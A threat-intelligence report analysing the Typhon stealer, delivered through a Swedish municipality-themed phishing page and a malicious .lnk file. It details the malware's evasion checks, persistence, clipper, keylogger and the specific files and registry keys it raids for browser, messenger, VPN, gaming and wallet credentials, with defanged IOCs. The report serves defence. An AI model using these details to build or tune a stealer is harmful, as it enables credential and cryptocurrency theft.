New stealer developing Crypto Miner capabilities
During a routine threat hunting exercise, Cyble Research Labs (CRL) came across a Twitter post wherein researchers mentioned a URL that hosts a Windows executable payload with the name systemupdate.exe. The researcher in the Twitter post claims this Windows executable is a variant of Typhon stealer malware delivered via a crafted .lnk file.
Upon analyzing the mentioned URL, we identified that it also hosts a phishing page that impersonates Lindesbergs Kommun (a municipality in Örebro County in central Sweden) to steal users’ sensitive information such as name, Social Security Number (SSN), ORT, and Credit/Debit card details and sends it to the Threat Actor’s (TAs) server.
When a user opens a .lnk file, it further executes a PowerShell command, downloads Typhon stealer from the remote server, and executes it. The below image shows the content of the .lnk file.
Cyble Research Labs also downloaded the Windows executable and performed a deep dive analysis on it. We observed that this malicious program is based on Prynt Stealer and can steal data from multiple applications. The developer of the stealer has also added a module for delivering XMRig CryptoMiner, which appears to be either in a development stage or the TA who generated this stealer using a builder did not add this functionality.
The TAs has also created a Telegram channel to communicate with the people who want to purchase Typhon stealer services. The below images show the Typhon stealer is updated through a Telegram channel, where the TA is actively working on releasing updates for the stealer. The TA sells this stealer via a lifetime subscription model for $50.
Interestingly, the TA also provides spreading and crypting services for the ones who purchase this stealer, as shown below.
Phishing Page Analysis
When the user visits the URL: hxxp://lindesbergparkeringsanmarkning[.]netlify[.], it opens a fake payment form with a name and logo related to Lindesbergs kommun which asks the users to pay 300 SEK(Swedish krona, the national currency of Sweden).
The payment form also asks for users’ sensitive information such as name, Social Security Number (SSN), ORT, and Credit/Debit card details.
When users enter their details in the above form page, it sends all the provided details to the server using Formspree through the URL: hxxps://formspree[.]io/f/xknylake.
Formspree is a form backend, API, and email service for HTML forms that sends form submissions via email without needing any coding or a backbend. It provides its services for free or at a very low cost.
After sending the users’ information to the server, the website redirects users to the Formspree acknowledgment page, which acknowledges the submission.
(Sample SHA256: 67afd1f116ffcf84c59bef3d3b925dc82dadebc21f2e8cc39b77892104b9e9ec)
The malware initially performs various Anti-Analysis checks if the TA enabled the Anit-Analysis functionality while building the malware. This stealer will return a binary flag with the value “True” if it detects antivirus applications or a sandbox environment and will terminate itself with a fake error message.
The malware identifies the following DLL files related to sandbox and antivirus programs in the victims’ machine using the GetModuleHandle() function.
|SxIn.dll||360 Total Security|
This stealer also checks if the following applications are running to prevent analysis of malware:
The stealer calls the CheckRemoteDebuggerPresent() function to identify the process being debugged. It also uses Windows Management Instrumentation (WMI) queries to detect the Virtual Environment, as shown below.
The stealer also checks for a mutex named “GOJJL2LPIZM04XC0NQ4I” to ensure that only one instance of malware is running in the victims’ machine. The malware terminates its execution if the mutex is already present.
The stealer also has the capability of spreading through mounted drives. It copies itself as a “USB-Service” to the mounted drives.
The stealer can also copy itself into the startup folder to establish persistence. Copying files to the startup folder enables the TA to execute the stealer upon user login automatically.
The stealer creates a hidden folder in the Local/AppData directory to store the stolen data. For naming this folder, it creates an MD5 hash using a concatenated string which consists of “Username, Computer Name, Culture, Processor Name, Video Controller Name.”
Under this, it creates another folder that will be named using the “Username + @ + Computer Name+ _ +Culture” string.
Clipper enables TAs to steal cryptocurrency by replacing the wallet address in the victim’s clipboard with their own wallet address. Typhon Stealer can perform clipping activities on the following Cryptocurrencies:
- Ethereum (ETH)
- Bitcoin (BTC)
- XRP (XRP)
- Stellar (XLM)
- Monero (XMR)
- Bitcoin Cash (BCH)
- Litecoin (LTC)
The figure below shows the Base64 encoded RegEx values to identify respective crypto addresses from the clipboard.
The stealer can also perform keylogging activities. It creates a separate thread for this functionality and saves the victim’s data under the “logs\\keylogger\\” folder. The figure below shows the Keylogger functionality in the stealer.
This Typhon sample targets three browsers:
- Chromium-based browsers
- Microsoft Edge
- Firefox-based browsers
Typhon stealer targets over 30 Chromium-based browsers, 5+ Mozilla-based browsers, and MS Edge. Every browser stores a file in the Local\AppData\Browser folder with sensitive information such as login credentials, cookies, autofill data, etc. The Typhon stealer target these files for stealing data. The figure below shows the browser directories targeted by the stealer.
Typhon stealer targets two FTP applications:
FileZilla is a free and open-source, cross-platform FTP application. It steals the data from “sitemanager.xml” and “recentservers.xml” and stores the data in the “Hosts.txt” file under the “FileZilla” folder for exfiltration.
WinSCP is a popular SFTP client and FTP client for Windows. WinSCP saves the user session-related data in the registry. Typhon stealer grabs the WinSCP data from “Software\\Martin Prikryl\\WinSCP 2\\Sessions” registry key.
Typhon Stealer targets the following gaming applications and steals sensitive data from the victim’s machine.
The malware identifies the Steam installation path by checking the registry key value at HKEY_LOCAL_MACHINE\Software\Valve\Steam. After this action, it enumerates the subkey present under HKEY_LOCAL_MACHINE\Software\Valve\Steam\Apps to get details of the application, as can be seen in the figure below. The malware also targets the steam’s SSFN file, known as the authorization file, and copies it for exfiltration.
The malware looks for “Ubisoft Game Launcher” in the AppData folder; if this folder is present, it copies all the files for exfiltration.
For Minecraft, the stealer checks if the “.minecraft” folder is present under the AppData directory. If it is present, it creates a folder named “Minecraft” under the “Gaming” folder to save the stolen data.
This stealer copies “launcher_profiles.json,” “servers.dat,” and screenshots to the “Minecraft” folder for exfiltration. It also extracts mods and version details and saves them in the respective text files created in the “Minecraft” folder.
The Typhon stealer targets the following messaging applications:
The malware first creates a folder named “Messenger,” which will be used for saving data from these applications. For stealing Discord tokens, it first searches for the following directories:
- Discord\\Local Storage\\leveldb
- discordptb\\Local Storage\\leveldb
- Discord Canary\\leveldb
The malware steals Telegram sessions by copying files from the “Telegram Desktop\tdata” folder. For Pidgin, the malware first identifies if “.purple\\accounts.xml” is present in the AppData folder. It steals the login credentials and protocol details and saves them into the “Pidgin Accounts.txt” file, as shown below.
This stealer steals credentials from three VPNs: ProtonVPN, OpenVPN, and NordVPN.
The malware first checks whether a VPN is installed or not by checking the directory C:\Users\[username]\AppData\Local\[VPN name], as shown in the figure below.
If a targeted VPN service is installed on the victim’s system, the stealer steals the credentials from the configuration files, such as user.config, etc., and copies the configuration file to the folder used for saving stolen data.
Typhon Stealer targets crypto wallets, as shown in the figure below. The stealer createsa folder named “Wallets” and then enumerates a list of BASE64 encoded wallets path to identify if a wallet is present on the victim’s system.
It also targets Blockchains such as Bitcoin, Dash, and Litecoin by fetching the path from registry key HKEY_CURRENT_USER\Software\Blockchain_name\ Blockchain_name-Qt
This stealer grabs files from directories such as Desktop, My Pictures, Personal, Downloads, OneDrive, and Dropbox. It only grabs files that are smaller than 5MB and have the extensions mentioned below.
|Document||pdf, RTF, doc, Docx, Xls, xlsx, ppt, pptx, indd, txt, JSON|
|Database||db, db3, db4, kdb, kdbx, SQL, SQLite, MDF, MDB, dsk, dbf, wallet, ini|
|SourceCode||c, cs, CPP, asm, sh, py, pyw, HTML, CSS, php, go, js, rb, pl, swift, java, kt, kts, ino|
|Image||jpg, jpeg, png, BMP, PSD, SVG, ai|
It also steals the system information such as Hardware Details, OS details, Windows product keys, etc. The figure below shows sample system information data stolen by the stealer. The stealer also has the functionality of taking pictures from the victim’s webcam.
Along with exfiltrating data to the Telegram channel, the stealer can also upload the stolen data to Anon Files. AnonFiles is a file upload and download service that allows users to host a file anonymously. The figure below shows the AnonFiles upload functionality.
It appears that this stealer can also be used for delivering XMRig, which is a Cryptominer. Currently, this feature is not in a functional state for this sample, but we suspect that in the future, TAs might use Typhon Stealer to deliver cryptominers.
Threat Actors continuously enhance their techniques to target users from various sectors, such as Govt. organizations and industries from various domains. In this case, they are using the Lindesbergs Kommun organization’s theme to lure the users and deploy the Typhon stealer payload.
In the past, Cyble has observed numerous data breaches in prominent organizations through such malicious programs. Organizations or individuals are advised to follow industry-standard cybersecurity practices to secure themselves and their firms.
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:
How to prevent malware infection?
- Avoid downloading pirated software from warez/torrent websites. The “Hack Tool” present on sites such as YouTube, torrent sites, etc., mainly contains such malware.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs.
- Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
- Monitor the beacon on the network level to block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solution on the employees’ systems.
MITRE ATT&CK® Techniques
|Tactic||Technique ID||Technique Name|
|Defense Evasion||T1497.001||Virtualization/Sandbox Evasion: System Checks|
|Credential Access||T1555 |
|Credentials from Password Stores |
Steal Web Session Cookie
Steal Application Access Token
|Account Discovery |
System Time Discovery
System Service Discovery
System Location Discovery
|Command and Control||T1095||Non-Application Layer Protocol|
|Exfiltration Over C&C Channel |
Exfiltration Over Web Service
Indicators of Compromise (IOCs)
|hxxp://lindesbergparkeringsanmarkning[.]netlify[.]app||URL||URL Hosting Phishing Page and TyphonStealer Payload|